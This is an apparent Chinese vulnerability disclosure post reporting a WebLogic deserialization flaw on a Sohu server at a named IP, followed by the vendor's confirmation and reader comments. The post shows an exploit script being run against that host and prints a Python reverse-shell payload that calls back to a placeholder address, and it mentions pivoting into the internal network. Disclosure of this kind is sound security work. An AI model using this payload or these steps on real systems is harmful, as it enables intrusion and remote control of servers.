搜狐某服务器的存在命令执行漏洞威胁内网安全

服务器 123.125.123.26 存在weblogic 反序列化漏洞，没想到搜狐也存在这样的漏洞。

python weblogic_exp.py http://123.125.123.26:8080
 
  weblogic unserialize vul is ok 123.125.123.26:8080
 
  WebPath: /DATA3/apps/psoft/webserv/HROUT

可以直接上传一个脚本反弹一个shell

import socket,subprocess,os
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect((" ip",23333));os.dup2(s.fileno(),0)
 os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
 p=subprocess.call(["/bin/sh","-i"])

先来查看一下IP，可以发现该服务器是出于内网的，所以内部信息可以直接代理访问，或者进一步的渗透

搜狐的内部安全中心

简单探测下内网。

修复下吧

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-03-30 00:25

厂商回复：

感谢支持

最新状态：

暂无

1. 2016-03-30 10:20 | feiyu ( 普通白帽子 | Rank:114 漏洞数:31 )

   1

   前排

   1# 回复此人

2. 2016-05-14 00:39 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

   0

   weblogic_exp.py 怎么写的啊，还可以取到路径啊

   2# 回复此人

3. 2016-05-14 01:43 | vforbox ( 路人 | Rank:2 漏洞数:3 | 我这么努力, 就是为了实现梦想)

   0

   问题是你是如何找到IP的...

   3# 回复此人